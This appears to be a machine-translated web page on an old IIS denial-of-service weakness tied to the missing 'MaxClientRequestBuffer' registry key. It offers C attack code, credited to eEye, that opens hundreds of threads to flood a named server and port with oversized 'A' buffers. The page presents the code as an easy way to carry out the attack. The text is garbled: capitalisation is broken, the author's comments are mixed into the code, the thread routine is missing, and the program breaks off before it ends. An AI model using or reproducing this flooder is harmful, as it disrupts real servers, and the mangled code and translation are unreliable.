The IIS Web server DOS
Vulnerability Description:
By default, IIS is vulnerable to denial of service attacks. If a key called "MaxClientRequestBuffer" has not been created in the registry, this NT system
The attacks of the EC usually work.
The "MaxClientRequestBuffer" key is used to set the amount of input that IIS is allowed to accept. If "MaxClientRequestBuffer"
Set to 256 (bytes), the attacker requests IIS to be limited to 256 bytes by entering a large number of characters. The default setting of the system does not limit this, so use
The following procedure. You can easily implement a DOS attack on IIS server:
#include <stdio.h>
#include <windows.h>
#define Max_thread 666
void CNG ();
Char *server;
Char *buffer;
int port;
int counter = 0;
int current_threads = 0;
int main (int argc, char **argv)
{
WORD Tequila;
Wsadata data;
int p;
DWORD Tid;
HANDLE hthread[2000];
This code is as and sucks as it is. Won ' t exit correctly and a lot
Of the other fun things.
That I didn ' t want to take of the time. So just CTRL + C out of the
Code.
Load up Cnghack.exe 3 charm.
printf ("CNG IIS DoS.") Marc@eEye.com http://www.eeye.com "for my
Beloved. " ");
if (argc<2) {
printf ("Usage:%s [Server] [port]", argv[0]);
Exit (1);
}
Buffer=malloc (17500);
memset (buffer, ' A ', strlen (buffer));
SERVER=ARGV[1];
Port=atoi (argv[2]);
Tequila = Makeword (1, 1);
printf ("Attempting to start Winsock ...") ");
if ((WSAStartup (Tequila, &data))!=0) {
printf ("Failed to start Winsock.");
Exit (1);
}
else{
printf ("Started Winsock.");
}
Counter = 0;
for (p = 0; p < max_thread; ++p) {
Hthread[counter] = CreateThread (0,
0,
(Lpthread_start_routine) CNG,
(void *) ++counter,
0,
&tid);
}
Sleep (250);
while (current_threads)
Sleep (250);
Counter = 0;
printf ("terminated Threads.");
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.